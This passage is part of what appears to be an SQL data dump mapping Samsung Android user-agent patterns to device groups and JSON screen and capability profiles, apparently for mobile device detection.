Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A310N0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A320F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A320FL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A320Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A5100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A510M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A520F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A520W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A530W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A7100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A710M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-A730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_a','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-C710F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_c','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G390F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G550FY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G570F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G570M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G570Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G6100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G610M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G610Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G611FF) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G611M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G615F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G890A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G891A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G903W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G920W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G925A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G925F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G925I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G925S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G925T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G925W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G928C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G928F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G928G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G928T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G930A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G930F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G930T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G930W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G935A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G935F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G935T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G955F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-G955U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J250F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J250G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J250M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J250Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J320A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J320AZ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J320W8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J327T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J327T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J3308) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J330F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J330FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J330G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J510F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J510FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J510FQ) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG SM-J510GN) AppleWebKit/* (KHTML, 